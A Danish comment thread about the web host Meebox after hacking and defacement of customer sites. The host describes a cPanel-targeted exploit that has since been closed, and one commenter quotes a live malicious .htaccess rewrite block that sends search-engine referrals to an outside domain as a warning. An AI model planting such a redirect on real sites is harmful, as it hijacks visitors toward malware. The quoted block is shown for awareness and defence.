Ros til Meebox

Anders - Meebox:

Også selvom vi i nogle tilfælde overfor kunden i vores forklaring/svar blot har fokuseret på at få hans/hendes side tilbage online, og så internt arbejdet videre med de lidt mere komplekse ting! :-)

Hej Anders,

Ingen tvivl om, at I arbejder hårdt på at genskabe såvel IT-sikkerheden på serverne, jævnfør jeres meddelelse direkte til kunderne, som brugernes tillid.

Med et flere timer langt nedbrud få dage inden hackerangrebene og defacing af et antal kunders webhoteller og sites i et par omgange, må det have givet jer nogle dyrt købte erfaringer, som I naturligvis helst havde været foruden.

Men selv om det nok kan være svært at erkende i åbent forum, vil jeg håbe, at I alligevel lærte at tage de første henvendelser om omfanget af sikkerhedsbrudene seriøst, i stedet for blot at opfordre kunderne til at "fjerne uønskede filer, som ikke hører til der".

Jeg ved også godt, at I har gang i nogle omfattende tekniske tiltag. Når I er kommet på den anden side af dem, håber jeg også at høre fra Patrick med den lovede tilbagemelding. 

Lad os håbe, at vi er på den anden side af disse udfordringer. :)

Dbh. John

Noget af det mest imponerende er, at jeg fik webhotellet gratis, da de havde fødselsdag (jeg ville dog have købt alligevel) - stadigvæk får jeg support nærmest døgnet rundt. Engang hvor jeg skulle have noget fixet kl. 1 fredag-lørdag nat, var de der såmænd også ;)

Heldigvis er jeg ikke blevet ramt her, men jeg tror dog, jeg vil rydde op i mine testinstallationer af diverse CMS, så de ikke åbner op for noget, da de ikke er i brug :-)

Selv de største og bedste kan blive bedre. Se bare vores kollegaer i branchen eller fx Microsoft. Der vil altid være nogle, som vil forsøge at finde nye exploits, hacks eller andre måder at udnytte og misbruge systemerne. Vi var blevet ramt af et nyt exploit, bygget til at target wordpress, joomla, magento samt generisk de-facing. Samtidig var det bygget til at fungere på cPanel, det system vi anvender. Derfor har vi været i kontakt med folkene bag cPanel, og i samarbejde med dem fået identificeret hvad som er sket og fået lukket muligheden for at anvende det exploit. 

Det er nogle dyrt købte erfaringer, som John også er inde på, men må vi tage med, lære af det og blive dygtigere af det. For god ordens skyld skal jeg dog sige, at det intet har at gøre med de andre problemer som John snakker om og at serverne ikke har været hacket på root-niveau eller lignende (for at afkræfte diverse rygter inden de opstår). Vi har arbejdet i døgndrift for at identificere og lukke det exploit som er anvendet, samtidig med vi har fået de ramte sider tilbage til normalen så hurtigt som muligt. Jeg er glad for at læse, at rigtig mange er rigtig glade for den hjælp vi har ydet.

Jeg er enig med de fleste af jer.

Da jeg startede med hjemmesider for et lille års tid siden, anede jeg overhovedet intet om det. Men de hjalp mig igennem processen - og den process har de hjulpet mig igennem mange gange (jeg er åbenbart glemsom, hvad angår teknik).

Vil også lige i anledningen smide en stor ros ud til Meebox. Utroligt at de må sådan en billig pris, kan yde sådan en god support.

- Thumbs Up!  

Det er ikke kun Meebox-kunder, der er angrebet. Der er noget specielt ondsindet malware i omløb lige for tiden. Indtil videre er én af mine sider blevet ramt 4 gange, mens en anden har fået .htaccess angreb 3 gange - og jeg er helt sikker på at mit FTP kodeord ikke er blevet hacket.

På den meget angrebne side ligger en Wordpress variant. Den anden er specialiseret software, som er mere modstandsdygtig. men Wordpress er IKKE en særlig sikker base at benytte.

Desuden er en restore fra backup IKKE en løsning på en dynamisk side med masser af nyt indhold hver dag.
Først og fremmest: Lås din htaccess og hold øje med den. Dernæst, sikr dig at din side kan modarbejde injections af diverse art.

Se fx denne, som er en af de meget aktive (og i øvrigt ændrer i mindst én php fil):

#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://planwood.com/modules/counter.php [R=301,L]
</IfModule>
#/c3284d#

Jeg er ked af at måtte sige det, men det lader til (for mig at se) at dette er produktet af SEO hacking. Faktisk er der tale om en redirect til en Twitter profil, så personen der ejer den får besøg.

Læs mere her: http://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html